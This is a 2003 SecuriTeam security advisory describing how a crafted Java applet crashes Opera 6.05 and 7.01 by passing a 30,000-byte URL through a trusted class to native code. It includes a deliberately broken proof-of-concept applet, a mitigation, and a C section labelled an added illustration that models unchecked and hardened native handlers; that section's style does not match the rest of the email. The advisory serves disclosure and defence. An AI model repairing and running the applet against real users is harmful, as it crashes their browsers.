[NT] Rogue Applet Can Crash Opera
From: support@securiteam.com
Date: 02/11/03
From: support@securiteam.com
To: list@securiteam.com
Date: 11 Feb 2003 15:18:07 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Rogue Applet Can Crash Opera
------------------------------------------------------------------------
SUMMARY
By analyzing the public interfaces of the Opera Java class libraries, a
specially crafted applet can be constructed that reaches a native (JNI)
routine through a trusted class and hands it an invalid parameter. The
routine does not validate the value, the JVM crashes and takes Opera with
it: a Denial of Service.
DETAILS
Vulnerable systems:
* Opera version 6.05
* Opera version 7.01
Analysis:
Opera ships its own classes in the opera.jar library. The system security
policy treats these classes as trusted, but they do not validate the input
they receive, so an untrusted applet can hand them hostile values. In the
proof of concept shown below, the showDocument method of a PluginContext
object is called with a URL object carrying a very long string (30000
bytes). Executing this method invokes a native method that cannot handle
such a value; the JVM crashes, and with it Opera. This was observed on
Windows XP with Opera 6.05 and 7.01, Java enabled, by loading the applet
directly after installation.
//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
//not runnable, a little crippled, there are a couple of obvious syntax
//errors to avoid script-kidding
..
import opera.PluginContext; // !! import the vulnerable class
..
public class OperaCall2 extends App1et
{
    public OperaCall2()
    {
    }

    // paint() runs as soon as the applet is displayed, so the crash
    // needs no user interaction beyond loading the page
    public void paint(Graphics g)
    {
        PluginContext plugincontext = new PluginContext(l);
        try
        {
            // a ~30000-character URL handed to the trusted class, which
            // forwards it to a native method without checking its length
            plugincontext.showDocument(new URL("http://xxx.xxx" + new String(new byte[30000])));
        }
        catch(Exception exception)
        {
            exception.printStackTrace();
        }
    }
}
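The proof of concept above works because a trusted class forwards an applet-controlled string to native code without bounding it. The following C program is an added illustration and not Opera's code (the native implementation behind opera.PluginContext.showDocument is not public): it models an unchecked native handler that copies the URL into a fixed buffer next to a hardened one that rejects over-long input at the JNI boundary, and feeds the hardened one a URL shaped like the PoC's. The buffer size URL_MAX, the function names and the "copy into a fixed buffer" failure mode are assumptions made for the example; the advisory itself only establishes that the native method cannot handle the value.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Added illustration, not Opera's code. Opera's native implementation is
 * closed, so URL_MAX and the fixed-buffer failure mode are assumptions
 * chosen to model "a native method that cannot handle the value".
 */
#define URL_MAX 2048

/* Model of the unchecked handler: trusts the Java caller to pass a sane
 * length. With the 30000-byte URL from the PoC this writes far past buf,
 * which is why the result is a JVM crash rather than a Java exception.
 * Kept only for contrast; never call it with an untrusted length. */
int native_show_document_unchecked(const char *url, size_t len)
{
    char buf[URL_MAX];
    memcpy(buf, url, len);      /* no bound check: len may exceed URL_MAX */
    buf[len] = '\0';
    return (int)strlen(buf);    /* stand-in for "dispatch buf to the browser" */
}

/* Hardened handler: the check sits on the native side of the JNI boundary,
 * where an applet that reaches the public Java method directly cannot
 * bypass it. Returns the number of bytes accepted, or -1 for an input the
 * fixed buffer cannot hold. */
int native_show_document_checked(const char *url, size_t len)
{
    char buf[URL_MAX];
    if (url == NULL || len >= sizeof buf)   /* leave room for the terminator */
        return -1;
    memcpy(buf, url, len);
    buf[len] = '\0';
    return (int)strlen(buf);
}

/* Constructed input with the PoC's shape: "http://xxx.xxx" followed by
 * 30000 filler bytes. The Java PoC appends new String(new byte[30000]);
 * 'A' is used here instead of zero bytes so that length-based C code sees
 * the full 30014 bytes. Returns the length written, 0 if cap is too small. */
size_t build_poc_url(char *out, size_t cap)
{
    const char prefix[] = "http://xxx.xxx";
    size_t n = strlen(prefix);
    if (cap < n + 30000)
        return 0;
    memcpy(out, prefix, n);
    memset(out + n, 'A', 30000);
    return n + 30000;
}

/* Runs the PoC-shaped URL through the checked handler; -1 means rejected. */
int poc_against_checked_handler(void)
{
    static char poc[40000];
    size_t len = build_poc_url(poc, sizeof poc);
    return native_show_document_checked(poc, len);
}

int main(void)
{
    const char normal[] = "http://www.securiteam.com/";

    printf("normal URL, checked handler: %d\n",
           native_show_document_checked(normal, strlen(normal)));
    printf("PoC-shaped URL, checked handler: %d\n",
           poc_against_checked_handler());
    /* native_show_document_unchecked() is deliberately not run with the
     * long input: it would corrupt the stack, i.e. reproduce the crash. */
    return 0;
}
```

The checked handler returns the byte count for a normal URL and -1 for the 30014-byte PoC-shaped one, so the caller gets an error it can turn into a Java exception instead of a dead process. The same bound could equally be enforced in the Java wrapper before the JNI call; the point is that a trusted class reachable from an untrusted applet never forwards the applet's data to native code unchecked.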
Vendor response:
Rather unpleasantly, the Opera team does not respond to bug reports, nor
does it read its own forum entries, to which the bug was also posted.
Solution:
Until a patch becomes available, disable Java by going to: File ->
Preferences -> Multimedia, and uncheck the "Enable Java" item.
ADDITIONAL INFORMATION
The information has been provided by Marc Schoenefeld
<mailto:schonef@uni-muenster.de>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.